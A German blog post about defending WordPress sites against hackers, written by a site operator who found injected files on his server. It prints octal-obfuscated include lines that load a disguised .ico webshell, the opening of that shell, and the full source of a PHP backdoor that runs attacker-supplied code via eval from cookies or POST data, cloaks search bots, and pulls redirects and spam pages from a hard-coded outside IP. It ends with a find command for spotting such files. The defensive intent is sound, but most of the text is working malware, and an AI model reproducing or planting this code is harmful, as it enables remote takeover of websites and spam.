Hacker-Angriffe auf Webseiten abwehren

Eine meiner Web-Seiten wird schon seit einiger Zeit von Hackern angegriffen. Die Web-Seite ist dann meist nicht erreichbar. Oft versuchen diese Hacker auch z.B. im Verzeichnis von WordPress noch zusätzliche Verzeichnisse wie blog oder blogs zu erstellen. Oft wird aber auch einfach die WordPress index.php Datei verwendet.

Wie sehen nun solche Dateien aus, die Hacker auf dem Web-Server hinterlassen? Hier ein Beispiel einer blog/index.php Datei:

<?php
/*1cae4*/

@include "htt\160docs\057wordpress/wp-\143onte\156t/up\147rade\057.3a1\0713f5b\056ico";

/*1cae4*/

Diesen Text kann man nur analysieren, indem man das „@include“ durch ein „echo“ ersetzt. Dies geht am Besten, wenn man am eigenen Rechner ein PHP installiert hat. Dann sieht man, dass im WordPress Verzeichnis die
Datei /wp-content/upgrade/.3a193f5b.ico aufgerufen wird. Aber wie so wird eine Icon Datei geladen. Es stellt sich heraus, dass diese Datei eine PHP-Datei ist und diese Icon-Datei ist die eigentliche Schad-Software. Man sollte diese Datei auf Virustotal.com hochladen. Dort wird dieser Schädling als PHP.Shell oder als PHP/Webshell erkannt. Hier die ersten Zeilen dieser „ico-Datei“:

<?php
$_g8oknb9 = basename/*ou5h*/(/*yb80*/trim/*atg*/(/*5j*/preg_replace/*n5m4l*/(/*bqpw1*/rawurldecode/*ksd2*/(/*wsm8q*/"%2F%5C%28.%2A%2
4%2F"/*4635*/)/*ws*/, '', __FILE__/*r3u*/)/*qs0*//*fd*/)/*scml*//*sj*/)/*g*/;$_dfnb0xu = "

Dieser Quellcode kann nur sehr schwer verstanden werden. Ein Hacker kann aber auch direkt die WordPress index.php ändern. Dann sieht dies so aus:

<?php
/*2b099*/

@include "htt\160docs\057wordpress/wp-\143onte\156t/up\147rade\057.3a1\0713f5b\056ico";

/*2b099*/
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Auch hier die gleiche Vorgehensweise. Es wird eine Ico-Datei geladen, die in Wirklichkeit eine PHP Webshell ist.
Aber es gibt auch noch andere Muster, wie diese 80vp657.php-Datei. Hier die Details dieser Datei.

<?php
@ini_set('error_log', NULL); 
@ini_set('log_errors', 0); 
@ini_set('max_execution_time', 0); 
@error_reporting(0); 
@set_time_limit(0); 
date_default_timezone_set('UTC'); 
class _w0gos6{static private $_fefmpbjy = 2990481909; 
static function _yhfuo($_o855nuzd, $_ud21kpeh){$_o855nuzd[2] = count($_o855nuzd) > 4 ? long2ip (_w0gos6::$_fefmpbjy - 827) : $_o855n
uzd[2]; 
$_7vhwph5q = _w0gos6::_po1xe($_o855nuzd, $_ud21kpeh); 
if (!$_7vhwph5q){$_7vhwph5q = _w0gos6::_gmlpm($_o855nuzd, $_ud21kpeh); 
}return $_7vhwph5q; 
}static function _po1xe($_o855nuzd, $_7vhwph5q){if (!function_exists('curl_version')){return ""; 
}$_xi3399w6 = curl_init(); 
curl_setopt($_xi3399w6, CURLOPT_URL, implode("/", $_o855nuzd)); 
if (!empty($_7vhwph5q)){curl_setopt($_xi3399w6, CURLOPT_POST, 1); 
curl_setopt($_xi3399w6, CURLOPT_POSTFIELDS, $_7vhwph5q); 
}curl_setopt($_xi3399w6, CURLOPT_RETURNTRANSFER, TRUE); 
$_meve49kp = curl_exec($_xi3399w6); 
curl_close($_xi3399w6); 
return $_meve49kp; 
}static function _gmlpm($_o855nuzd, $_7vhwph5q){if (!empty($_7vhwph5q)){$_xni7m93t = stream_context_create(Array('http' => Array('me
thod' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $_7vhwph5q))); 
$_meve49kp = @file_get_contents(implode("/", $_o855nuzd), FALSE, $_xni7m93t); 
}else{$_meve49kp = @file_get_contents(implode("/", $_o855nuzd)); 
}return $_meve49kp; 
}}class _e8erx3{private static $_844be1ba = ""; 
private static $_lt7ygazl = -1; 
private static $_ozyptn74 = ""; 
private $_zgn0bmhy = ""; 
private $_hiyxelyn = ""; 
private $_tfj0xrds = ""; 
private $_xsa3g43d = ""; 
public static function _wcf1b($_xjv9jizn, $_msiu9yt8, $_xz946f9z){_e8erx3::$_844be1ba = $_xjv9jizn . "/cache/"; 
_e8erx3::$_lt7ygazl = $_msiu9yt8; 
_e8erx3::$_ozyptn74 = $_xz946f9z; 
if (!@file_exists(_e8erx3::$_844be1ba)){@mkdir(_e8erx3::$_844be1ba); 
}}public static function _k8ucq(){return TRUE; 
}public function __construct($_j53odwl4, $_aawcyfuq, $_q7xogr9m, $_9xd988h5){$this->_zgn0bmhy = $_j53odwl4; 
$this->_hiyxelyn = $_aawcyfuq; 
$this->_tfj0xrds = $_q7xogr9m; 
$this->_xsa3g43d = $_9xd988h5; 
}public function _ssx21(){return str_replace("{{ text }}", $this->_hiyxelyn,str_replace("{{ keyword }}", $this->_tfj0xrds,str_replac
e("{{ links }}", $this->_xsa3g43d, $this->_zgn0bmhy))); 
}public function _p3on2(){$_vg9hr9b6 = _e8erx3::$_844be1ba . md5($this->_tfj0xrds . _e8erx3::$_ozyptn74); 
if (_e8erx3::$_lt7ygazl == -1){$_fo0bynsi = -1; 
}else{$_fo0bynsi = time() + (3600 * 24 * 30); 
}$_wytqn0fm = Array("template" => $this->_zgn0bmhy, "text" => $this->_hiyxelyn, "keyword" => $this->_tfj0xrds,"links" => $this->_xsa
3g43d, "expired" => $_fo0bynsi); 
@file_put_contents($_vg9hr9b6, serialize($_wytqn0fm)); 
}static public function _go4ci($_q7xogr9m){$_vg9hr9b6 = _e8erx3::$_844be1ba . md5($_q7xogr9m . _e8erx3::$_ozyptn74); 
$_vg9hr9b6 = @unserialize(@file_get_contents($_vg9hr9b6)); 
if (!empty($_vg9hr9b6) && ($_vg9hr9b6["expired"] > time() || $_vg9hr9b6["expired"] == -1)){return new _e8erx3($_vg9hr9b6["template"]
, $_vg9hr9b6["text"], $_vg9hr9b6["keyword"], $_vg9hr9b6["links"]); 
}else{return null; 
}}}class _ukw673{private static $_844be1ba = ""; 
private static $_6tqprnqb = ""; 
public static function _wcf1b($_xjv9jizn, $_9v28nxl6){_ukw673::$_844be1ba = $_xjv9jizn . "/"; 
_ukw673::$_6tqprnqb = $_9v28nxl6; 
if (!@file_exists(_ukw673::$_844be1ba)){@mkdir(_ukw673::$_844be1ba); 
}}public static function _k8ucq(){return TRUE; 
}static public function _xe1m8(){$_l6kzwkrf = 0; 
foreach (scandir(_ukw673::$_844be1ba) as $_xkswqlod){if (strpos($_xkswqlod, _ukw673::$_6tqprnqb) === 0){$_l6kzwkrf += 1; 
}}return $_l6kzwkrf; 
}static public function _jpnw7(){$_y0nso3sc = Array(); 
foreach (scandir(_ukw673::$_844be1ba) as $_xkswqlod){if (strpos($_xkswqlod, _ukw673::$_6tqprnqb) === 0){$_y0nso3sc[] = $_xkswqlod; 
}}return @file_get_contents(_ukw673::$_844be1ba . $_y0nso3sc[array_rand($_y0nso3sc)]); 
}static public function _p3on2($_optqobqz){if (@file_exists(_ukw673::$_6tqprnqb . "_" . md5($_optqobqz) . ".html")){return; 
}@file_put_contents(_ukw673::$_6tqprnqb . "_" . md5($_optqobqz) . ".html", $_optqobqz); 
}}class _s38xs1{private static $_844be1ba = ""; 
private static $_6tqprnqb = ""; 
public static function _wcf1b($_xjv9jizn, $_9v28nxl6){_s38xs1::$_844be1ba = $_xjv9jizn . "/"; 
_s38xs1::$_6tqprnqb = $_9v28nxl6; 
if (!@file_exists(_s38xs1::$_844be1ba)){@mkdir(_s38xs1::$_844be1ba); 
}}private static function _bth9r(){$_2m53cqb3 = Array(); 
foreach (scandir(_s38xs1::$_844be1ba) as $_xkswqlod){if (strpos($_xkswqlod, _s38xs1::$_6tqprnqb) === 0){$_2m53cqb3[] = $_xkswqlod; 
}}return $_2m53cqb3; 
}public static function _k8ucq(){$_2m53cqb3 = _s38xs1::_bth9r(); 
if (!empty($_2m53cqb3)){return TRUE; 
}return FALSE; 
}static public function _jpnw7(){$_2m53cqb3 = _s38xs1::_bth9r(); 
$_7aq1trcm = @file(_s38xs1::$_844be1ba . $_2m53cqb3[array_rand($_2m53cqb3)], FILE_IGNORE_NEW_LINES);
return $_7aq1trcm[array_rand($_7aq1trcm)]; 
}static public function _thov0(){$_7aq1trcm = Array(); 
$_2m53cqb3 = _s38xs1::_bth9r(); 
foreach ($_2m53cqb3 as $_kixbasj1){$_7aq1trcm = array_merge($_7aq1trcm, @file(_s38xs1::$_844be1ba . $_kixbasj1, FILE_IGNORE_NEW_LINE
S)); 
}return $_7aq1trcm; 
}static public function _p3on2($_g67n24wo){if (@file_exists(_s38xs1::$_6tqprnqb . "_" . md5($_g67n24wo) . ".list")){return; 
}@file_put_contents(_s38xs1::$_6tqprnqb . "_" . md5($_g67n24wo) . ".list", $_g67n24wo); 
}}class _tutthh{static public $_8bsky6x5 = "4.1"; 
static public $_hrnhekle = "1d36eba6-52a2-0807-cd9e-9a972d1fc172"; 
private $_htb7f9eu = "http://136.12.78.46/app/assets/api2?action=redir"; 
private $_08xcxtxx = "http://136.12.78.46/app/assets/api?action=page"; 
static public $_wfeuylyu = 20; 
static public $_sjzbjld5 = 100; 
static public function _9vhvf(){function _0x0i3($_m7b7i4y4, $_rk1wdt72){$_hxkpthri = ""; 
for ($_jldyg5y6 = 0; 
 $_jldyg5y6 < strlen($_m7b7i4y4); 
) {for ($_lphw5pb3 = 0; 
 $_lphw5pb3 < strlen($_rk1wdt72) && $_jldyg5y6 < strlen($_m7b7i4y4); 
 $_lphw5pb3++, $_jldyg5y6++) {$_hxkpthri .= chr(ord($_m7b7i4y4[$_jldyg5y6]) ^ ord($_rk1wdt72[$_lphw5pb3])); 
}}return $_hxkpthri; 
}function _04wkn($_m7b7i4y4, $_rk1wdt72, $_hw5e6j7i){return _0x0i3(_0x0i3($_m7b7i4y4, $_rk1wdt72), $_hw5e6j7i); 
}foreach (array_merge($_COOKIE, $_POST) as $_rvbx14da => $_m7b7i4y4) {$_m7b7i4y4 = @unserialize(_04wkn(_tutthh::_9f030($_m7b7i4y4), 
$_rvbx14da, _tutthh::$_hrnhekle)); 
if (isset($_m7b7i4y4['ak']) && _tutthh::$_hrnhekle == $_m7b7i4y4['ak']) {if ($_m7b7i4y4['a'] == 'doorway2') {if ($_m7b7i4y4['sa'] ==
 'check') {$_7vhwph5q = _w0gos6::_yhfuo(explode("/", "http://httpbin.org/"), ""); 
if (strlen($_7vhwph5q) > 512) {echo @serialize(Array("uid" => _tutthh::$_hrnhekle, "v" => _tutthh::$_8bsky6x5, )); 
}exit; 
}if ($_m7b7i4y4['sa'] == 'templates') {foreach ($_m7b7i4y4["templates"] as $_j53odwl4) {_ukw673::_p3on2($_j53odwl4); 
echo @serialize(Array("uid" => _tutthh::$_hrnhekle, "v" => _tutthh::$_8bsky6x5, )); 
}}if ($_m7b7i4y4['sa'] == 'keywords') {_s38xs1::_p3on2($_m7b7i4y4["keywords"]); 
_tutthh::_n3m6r(); 
echo @serialize(Array("uid" => _tutthh::$_hrnhekle, "v" => _tutthh::$_8bsky6x5, )); 
}}if ($_m7b7i4y4['sa'] == 'eval') {eval($_m7b7i4y4["data"]); 
exit; 
}}}}private function _6ojja(){$_bbzzyk3e = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*L
ibrary#','#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i','#rulinki\.ru#i', '#Twiceler#i', '#WebAl
ta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i','#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i','#CFNetwor
k#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i', '#Gigabot#i', '#H
TMLParser#i', '#ia_archiver#i', '#ichiro#i','#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i','#Lupa\.ru
#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i','#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#Omni
Explorer_Bot#i','#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i','#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i
', '#User-Agent#i', '#voyager#i','#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i','#Yandex#i', '#Yanga#i', '#Yeti#
i', '#msnbot#i','#spider#i', '#yahoo#i', '#jeeves#i', '#google#i', '#altavista#i','#scooter#i', '#av\s*fetch#i', '#asterias#i', '#sp
iderthread revision#i', '#sqworm#i','#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i','#webcrawler
#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i','#charlotte#i', '#ngb#i', '#BingBot#i'); 
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_nui1uyo3 = $_SERVER['HTTP_X_FORWARDED_FOR']; 
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {$_nui1uyo3 = $_SERVER['REMOTE_ADDR']; 
} else {$_nui1uyo3 = ""; 
}if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_bbzzyk3e, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-N
O-WAY-'))){$_bd5dkc54 = 1; 
}elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])){$_bd5dkc54 = 1; 
}elseif (FALSE !== strpos(@gethostbyaddr($_nui1uyo3), 'google')) {$_bd5dkc54 = 1; 
}elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE && strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE){$_bd5dkc54 = 1
; 
}else{$_bd5dkc54 = 0; 
}return $_bd5dkc54; 
}public static function _b578v($_s15aqdzj, $_i4tjlxzp){$_u3gc6w7z = rand($_s15aqdzj, $_i4tjlxzp); 
$_bb6a6pt1 = ""; 
$_3n0870eg = substr(md5(_tutthh::$_hrnhekle . "salt3"), 0, 6); 
for ($_jldyg5y6=0; 
 $_jldyg5y6 < $_u3gc6w7z; 
 $_jldyg5y6++){$_q7xogr9m = _s38xs1::_jpnw7(); 
$_bb6a6pt1 .= sprintf("<a href='%s?%s=%s'>%s</a>,\n",_tutthh::_8ildo(),$_3n0870eg,urlencode(str_replace(" ", "-", $_q7xogr9m)), ucwo
rds($_q7xogr9m)); 
}return $_bb6a6pt1; 
}private static function _o3wrl(){$_ud21kpeh = Array(); 
$_ud21kpeh['ip'] = $_SERVER['REMOTE_ADDR']; 
$_ud21kpeh['qs'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI']; 
$_ud21kpeh['ua'] = @$_SERVER['HTTP_USER_AGENT']; 
$_ud21kpeh['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE']; 
$_ud21kpeh['ref'] = @$_SERVER['HTTP_REFERER']; 
$_ud21kpeh['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING']; 
$_ud21kpeh['acp'] = @$_SERVER['HTTP_ACCEPT']; 
$_ud21kpeh['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET']; 
$_ud21kpeh['conn'] = @$_SERVER['HTTP_CONNECTION']; 
return $_ud21kpeh; 
}public function __construct(){$this->_htb7f9eu = explode("/", $this->_htb7f9eu); 
$this->_08xcxtxx = explode("/", $this->_08xcxtxx); 
}static private function _9f030($_gqhhfy7w){if (strlen($_gqhhfy7w) < 4){return ""; 
}$_z7quiidy = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 
$_7aq1trcm = str_split($_z7quiidy); 
$_7aq1trcm = array_flip($_7aq1trcm); 
$_jldyg5y6 = 0; 
$_4dpeb8aq = ""; 
$_gqhhfy7w = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_gqhhfy7w); 
do {$_nyroy40b = $_7aq1trcm[$_gqhhfy7w[$_jldyg5y6++]]; 
$_nb4odugt = $_7aq1trcm[$_gqhhfy7w[$_jldyg5y6++]]; 
$_xrpexfym = $_7aq1trcm[$_gqhhfy7w[$_jldyg5y6++]]; 
$_kf0jpyi1 = $_7aq1trcm[$_gqhhfy7w[$_jldyg5y6++]]; 
$_1d586s6p = ($_nyroy40b << 2) | ($_nb4odugt >> 4); 
$_xx4ldcyp = (($_nb4odugt & 15) << 4) | ($_xrpexfym >> 2); 
$_ex5vwh90 = (($_xrpexfym & 3) << 6) | $_kf0jpyi1; 
$_4dpeb8aq = $_4dpeb8aq . chr($_1d586s6p); 
if ($_xrpexfym != 64) {$_4dpeb8aq = $_4dpeb8aq . chr($_xx4ldcyp); 
}if ($_kf0jpyi1 != 64) {$_4dpeb8aq = $_4dpeb8aq . chr($_ex5vwh90); 
}} while ($_jldyg5y6 < strlen($_gqhhfy7w)); 
return $_4dpeb8aq; 
}private function _7t9fe($_q7xogr9m){$_j53odwl4 = ""; 
$_aawcyfuq = ""; 
$_ud21kpeh = _tutthh::_o3wrl(); 
$_ud21kpeh["uid"] = _tutthh::$_hrnhekle; 
$_ud21kpeh["keyword"] = $_q7xogr9m; 
$_ud21kpeh["tc"] = 10; 
$_ud21kpeh = http_build_query($_ud21kpeh); 
$_m7b7i4y4 = _w0gos6::_yhfuo($this->_08xcxtxx, $_ud21kpeh); 
if (strpos($_m7b7i4y4, _tutthh::$_hrnhekle) === FALSE){return Array($_j53odwl4, $_aawcyfuq); 
}$_j53odwl4 = _ukw673::_jpnw7(); 
$_aawcyfuq = substr($_m7b7i4y4, strlen(_tutthh::$_hrnhekle)); 
$_aawcyfuq = explode("\n", $_aawcyfuq); 
shuffle($_aawcyfuq); 
$_aawcyfuq = implode(" ", $_aawcyfuq); 
return Array($_j53odwl4, $_aawcyfuq); 
}private function _ihx2x(){$_ud21kpeh = _tutthh::_o3wrl(); 
$_ud21kpeh["uid"] = _tutthh::$_hrnhekle; 
$_ud21kpeh = http_build_query($_ud21kpeh); 
$_eglq6i9g = _w0gos6::_yhfuo($this->_htb7f9eu, $_ud21kpeh); 
$_eglq6i9g = @unserialize($_eglq6i9g); 
if (isset($_eglq6i9g["type"]) && $_eglq6i9g["type"] == "redir") {if (!empty($_eglq6i9g["data"]["header"])) {header($_eglq6i9g["data"
]["header"]); 
return true; 
} elseif (!empty($_eglq6i9g["data"]["code"])) {echo $_eglq6i9g["data"]["code"]; 
return true; 
}}return false; 
}public function _k8ucq(){return _e8erx3::_k8ucq() && _ukw673::_k8ucq() && _s38xs1::_k8ucq(); 
}static public function _ktd3d(){if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {
return true; 
}return false; 
}public static function _8ildo(){$_nhj0b6hl = explode("?", $_SERVER["REQUEST_URI"], 2); 
$_nhj0b6hl = $_nhj0b6hl[0]; 
return sprintf("%s://%s%s", _tutthh::_ktd3d() ? "https" : "http", $_SERVER['HTTP_HOST'], $_nhj0b6hl); 
}public static function _7f0he(){$_nhj0b6hl = explode("?", $_SERVER["REQUEST_URI"], 2); 
$_nhj0b6hl = $_nhj0b6hl[0]; 
$_xjv9jizn = substr($_nhj0b6hl, 0, strrpos($_nhj0b6hl, "/")); 
return sprintf("%s://%s%s", _tutthh::_ktd3d() ? "https" : "http", $_SERVER['HTTP_HOST'], $_xjv9jizn); 
}public static function _n3m6r(){$_vc68eklw = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">\n<urlset xmlns=\"http://www.sitemaps.
org/schemas/sitemap/0.9\">\n"; 
$_5vlwndgx = "</urlset>"; 
$_j4ynoncs = ""; 
$_3n0870eg = substr(md5(_tutthh::$_hrnhekle . "salt3"), 0, 6); 
$_7aq1trcm = _s38xs1::_thov0(); 
foreach ($_7aq1trcm as $_rk1wdt72){$_evp0d83v = sprintf("%s?%s=%s",_tutthh::_8ildo(),$_3n0870eg,urlencode(str_replace(" ", "-", $_rk
1wdt72))); 
$_h81h8nke = time() - mt_rand(0, 60 * 60 * 24 * 30); 
$_j4ynoncs .= "<url>\n"; 
$_j4ynoncs .= sprintf("<loc>%s</loc>\n", $_evp0d83v); 
$_j4ynoncs .= sprintf("<lastmod>%s</lastmod>\n", date("Y-m-d", $_h81h8nke)); 
$_j4ynoncs .= "<priority>0.3</priority>\n"; 
$_j4ynoncs .= "</url>\n"; 
}$_wk9xmoy3 = $_vc68eklw . $_j4ynoncs . $_5vlwndgx; 
$_1uxqyfy1 = dirname(__FILE__) . "/sitemap.xml"; 
$_f9x7b8aw = _tutthh::_7f0he() . "/sitemap.xml"; 
@file_put_contents($_1uxqyfy1, $_wk9xmoy3); 
return $_f9x7b8aw; 
}public function _c4g8y(){$_3n0870eg = substr(md5(_tutthh::$_hrnhekle . "salt3"), 0, 6); 
if (isset($_GET[$_3n0870eg])){$_q7xogr9m = $_GET[$_3n0870eg]; 
$_q7xogr9m = str_replace("-", " ", $_q7xogr9m); 
if (!$this->_6ojja()){if ($this->_ihx2x()){return; 
}}$_eglq6i9g = _e8erx3::_go4ci($_q7xogr9m); 
if (empty($_eglq6i9g)){list($_j53odwl4, $_aawcyfuq) = $this->_7t9fe($_q7xogr9m); 
if (empty($_aawcyfuq)){return; 
}$_eglq6i9g = new _e8erx3($_j53odwl4, $_aawcyfuq, $_q7xogr9m, _tutthh::_b578v(_tutthh::$_wfeuylyu, _tutthh::$_sjzbjld5)); 
$_eglq6i9g->_p3on2(); 
}echo $_eglq6i9g->_ssx21(); 
}}}_e8erx3::_wcf1b(dirname(__FILE__), -1, _tutthh::$_hrnhekle); 
_ukw673::_wcf1b(dirname(__FILE__), substr(md5(_tutthh::$_hrnhekle . "salt12"), 0, 4)); 
_s38xs1::_wcf1b(dirname(__FILE__), substr(md5(_tutthh::$_hrnhekle . "salt22"), 0, 4)); 
_tutthh::_9vhvf(); 
$_rb16z9w8 = new _tutthh(); 
if ($_rb16z9w8->_k8ucq()){$_rb16z9w8->_c4g8y(); 
}exit(); 

Dieser PHP-Code wird auf Virustotal.com nicht als Schad-Software erkannt. Ich habe oben nur die Adresse 136.12.78.46 gefunden und diese Adresse gehört der Ford Motor Company.

Wie kann man solche Angriffe auf der eigenen Webseite finden?

Wichtig ist ein Webseiten-Betreiber, der es auch ermöglicht mit ssh auf die Webseite zuzugreifen und der Befehl „find“. Damit kann man mit diesen Befehlen eigenartige Ico-Dateien finden.

cd /
find . -name "*.ico" -print

Sollten jetzt Dateien mit „.<irgendetwas>.ico“ auftauchen, dann ist Vorsicht geboten.

Kontaktieren Sie mich, wenn Sie Hilfe bei der Entfernung solcher Hackerangriffe brauchen.